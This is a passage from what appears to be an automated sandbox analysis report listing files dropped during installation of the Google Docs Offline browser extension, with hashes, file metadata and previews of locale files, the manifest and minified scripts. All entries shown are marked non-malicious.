                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):879
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                    MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                    SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                    SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                    SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                    MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                    SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                    SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                    SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):843
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                    MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                    SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                    SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                    SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11406
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                    MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                    SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                    SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                    SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                    MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                    SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                    SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                    SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):122218
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                    MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                    SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                    SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                    SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130866
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                    MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                    SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                    SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                    SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.983741779718597
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8ndwT0kcHpidAKZdA19ehwiZUklqehRy+3:8yPq+y
                                                                                                                                                                                                                                                                                    MD5:10B3898589A02774EA4DA15F02290816
                                                                                                                                                                                                                                                                                    SHA1:70185CFF124673FD26D40125047D357397EF66C9
                                                                                                                                                                                                                                                                                    SHA-256:D26C68CE95E4B6E3B12A7BACFCA0AE9E182C6E97DA0AB99C36F3BF50A8D8948D
                                                                                                                                                                                                                                                                                    SHA-512:E3704EFDDF303C3BBB7EA27209EF49B76744A41C88E769C85C77127628FD699B0DB2499D5D1B3E9C72215833275562262200C9ED04CFB50E1D26B3F36DEF8BB6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,........T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y0/....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y0/....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y0/....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y0/..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y2/...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........A........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:57:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9972869301179346
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8ltdwT0kcHpidAKZdA1weh/iZUkAQkqehuy+2:8WPg9Qzy
                                                                                                                                                                                                                                                                                    MD5:E35C637C9E603C16F23C7E7473CDAD69
                                                                                                                                                                                                                                                                                    SHA1:B7B5B81BCB9DE4A28EFFEF67177B4E75F35C20C4
                                                                                                                                                                                                                                                                                    SHA-256:F21868776B7C5D78965DBFC3567C0368132E684531F1D39E44C612793C0A2DDC
                                                                                                                                                                                                                                                                                    SHA-512:31F3458E2190AFD981CACEAA870B20C3AB57197E37BD0BE2AFB4F2D49F3CA28BF6F72AEEB6D0B9489D2371EB493A46C046C7E5E18C9704A6C5B4C43FC9251793
                                                                                                                                                                                                                                                                                    Malicious:false
